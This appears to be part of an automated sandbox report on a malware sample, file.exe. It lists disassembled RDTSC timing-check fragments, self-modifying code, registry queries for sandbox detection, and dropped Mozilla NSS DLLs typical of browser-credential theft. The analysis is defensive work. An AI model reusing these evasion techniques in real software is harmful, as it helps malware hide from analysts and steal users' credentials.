Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D272B5 second address: D272C5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3780D2BA72h 0x00000008 jnl 00007F3780D2BA66h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D272C5 second address: D272E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3780CDC711h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D27430 second address: D2745C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jg 00007F3780D2BA66h 0x0000000c popad 0x0000000d jne 00007F3780D2BA7Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2745C second address: D274B2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jc 00007F3780CDC706h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jno 00007F3780CDC725h 0x00000013 ja 00007F3780CDC70Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F3780CDC716h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D27B5D second address: D27B61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D27B61 second address: D27B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3780CDC70Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D27B76 second address: D27B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D27B7F second address: D27BAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780CDC711h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3780CDC70Ch 0x00000010 jl 00007F3780CDC71Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D27BAA second address: D27BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3780D2BA6Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D27BBD second address: D27BDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780CDC718h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D27BDA second address: D27BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D26292 second address: D2629F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F3780CDC71Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2DC45 second address: D2DC5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F3780D2BA6Eh 0x0000000c popad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2D62E second address: D2D64B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780CDC719h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2D64B second address: D2D651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2D7E6 second address: D2D823 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3780CDC706h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007F3780CDC723h 0x00000012 pushad 0x00000013 jmp 00007F3780CDC70Bh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3AA69 second address: D3AA6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3CAE7 second address: D3CB2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3780CDC718h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F3780CDC713h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F3780CDC711h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3CC84 second address: D3CC9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780D2BA76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D450D1 second address: D450F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jl 00007F3780CDC706h 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3780CDC713h 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D450F7 second address: D450FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4E1C2 second address: D4E1C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5279D second address: D527A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D527A1 second address: D527A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D527A7 second address: D527D7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jne 00007F3780D2BA66h 0x00000009 pop edi 0x0000000a push edx 0x0000000b jo 00007F3780D2BA66h 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push ecx 0x00000018 jmp 00007F3780D2BA6Fh 0x0000001d pop ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 jng 00007F3780D2BA66h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D527D7 second address: D527F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780CDC719h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D527F9 second address: D527FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D58BCC second address: D58BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D58BD5 second address: D58C1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780D2BA78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c je 00007F3780D2BA66h 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F3780D2BA74h 0x0000001e js 00007F3780D2BA66h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D58C1B second address: D58C2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780CDC70Eh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D58C2F second address: D58C37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D58D8D second address: D58D91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5990C second address: D59937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jc 00007F3780D2BA66h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F3780D2BA75h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007F3780D2BA66h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D59937 second address: D5993B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6085F second address: D60864 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D60864 second address: D60889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3780CDC716h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F3780CDC706h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D606A9 second address: D606AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D606AF second address: D606E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3780CDC718h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3780CDC713h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D65532 second address: D65536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6534D second address: D6537E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F3780CDC708h 0x0000000c jmp 00007F3780CDC70Ah 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F3780CDC712h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6537E second address: D65384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D65384 second address: D65388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D65388 second address: D65394 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F3780D2BA66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6CB7C second address: D6CB97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F3780CDC70Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c je 00007F3780CDC706h 0x00000012 pushad 0x00000013 popad 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D68D0D second address: D68D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F3780D2BA66h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7A6A4 second address: D7A6B0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3780CDC706h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7A6B0 second address: D7A6B5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D892A3 second address: D892B3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3780CDC706h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D892B3 second address: D892B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D89AD7 second address: D89ADB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D89ADB second address: D89AF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F3780D2BA66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007F3780D2BA72h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D89AF9 second address: D89AFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D89AFF second address: D89B03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D89B03 second address: D89B15 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jp 00007F3780CDC706h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D89C7F second address: D89C96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pushad 0x00000009 ja 00007F3780D2BA66h 0x0000000f jo 00007F3780D2BA66h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D89C96 second address: D89C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D89F3B second address: D89F6C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3780D2BA66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b pushad 0x0000000c jmp 00007F3780D2BA76h 0x00000011 jmp 00007F3780D2BA6Ah 0x00000016 push esi 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8B821 second address: D8B84B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780CDC70Dh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jnp 00007F3780CDC706h 0x00000010 jbe 00007F3780CDC706h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jnp 00007F3780CDC706h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8B84B second address: D8B854 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8E578 second address: D8E592 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3780CDC706h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 js 00007F3780CDC706h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8E592 second address: D8E5A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780D2BA6Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8E5A2 second address: D8E5B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780CDC70Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D91683 second address: D9169A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F3780D2BA71h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9169A second address: D916A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780CDC70Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D911EB second address: D9120B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F3780D2BA71h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9120B second address: D91215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3780CDC706h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D93132 second address: D93136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D93136 second address: D9313A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9313A second address: D93149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F3780D2BA66h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D93149 second address: D93177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F3780CDC706h 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007F3780CDC718h 0x00000016 pushad 0x00000017 popad 0x00000018 push esi 0x00000019 pop esi 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50102DC second address: 50102F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780D2BA71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50102F1 second address: 501031D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780CDC711h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F3780CDC70Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov al, 95h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 501031D second address: 5010322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010322 second address: 5010341 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780CDC714h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010341 second address: 5010345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010345 second address: 5010349 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010349 second address: 501034F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 501034F second address: 5010382 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780CDC714h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3780CDC717h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 501043C second address: 5010440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010440 second address: 5010446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB220C second address: CB2211 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB2374 second address: CB2378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB2378 second address: CB237E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB257D second address: CB258E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010C66 second address: 5010CFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780D2BA79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F3780D2BA79h 0x00000012 xor ax, 87A6h 0x00000017 jmp 00007F3780D2BA71h 0x0000001c popfd 0x0000001d push esi 0x0000001e pop ebx 0x0000001f popad 0x00000020 popad 0x00000021 push eax 0x00000022 pushad 0x00000023 jmp 00007F3780D2BA73h 0x00000028 push eax 0x00000029 push edx 0x0000002a pushfd 0x0000002b jmp 00007F3780D2BA76h 0x00000030 add cx, 07A8h 0x00000035 jmp 00007F3780D2BA6Bh 0x0000003a popfd 0x0000003b rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: CA67C9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: CB86A2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: B01AA4 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008B4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_008B4910
